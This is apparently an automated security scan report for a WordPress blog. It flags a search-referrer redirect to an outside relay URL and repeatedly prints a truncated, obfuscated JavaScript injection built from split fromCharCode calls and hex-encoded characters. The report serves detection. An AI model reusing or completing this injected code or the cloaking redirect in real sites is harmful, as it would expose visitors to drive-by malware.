Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.gauthamk.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.gauthamk.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 31 Aug 2014 06:00:20 GMT Location: http://jchauto.pl/relay.php Server: Apache Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.gauthamk.com/ | 200 OK Content-Length: 9608 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
| ||
http://www.gauthamk.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: text/javascript | clean |
http://stats.wordpress.com/e-201435.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://www.gauthamk.com/sample-page/ | 200 OK Content-Length: 8968 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
| ||
http://www.gauthamk.com/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 31 Aug 2014 06:00:24 GMT Pragma: no-cache Location: http://www.gauthamk.com/wp-login.php?redirect_to=http%3A%2F%2Fwww.gauthamk.com%2Fwp-admin%2F&reauth=1 Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 31 Aug 2014 06:00:25 GMT | clean |
http://www.gauthamk.com/wp-login.php?redirect_to=http%3a%2f%2fwww.gauthamk.com%2fwp-admin%2f&reauth=1 | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://www.gauthamk.com/test404page.js | 404 Not Found Content-Length: 7739 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
| ||
http://www.gauthamk.com/2011/07/06/book-of-speed/ | 200 OK Content-Length: 11057 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
| ||
http://www.gauthamk.com/tag/page-performance/ | 200 OK Content-Length: 9088 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
| ||
http://www.gauthamk.com/category/web-performance/ | 200 OK Content-Length: 9095 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
| ||
http://www.gauthamk.com/2011/06/29/hello-world/ | 200 OK Content-Length: 10157 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
| ||
http://www.gauthamk.com/category/uncategorized/ | 200 OK Content-Length: 8239 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x63,0x72,0x64,0x6c,0x63,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29 Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gauthamk.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gauthamk.com/
Result: gauthamk.com is not infected or malware details are not published yet.
Result: gauthamk.com is not infected or malware details are not published yet.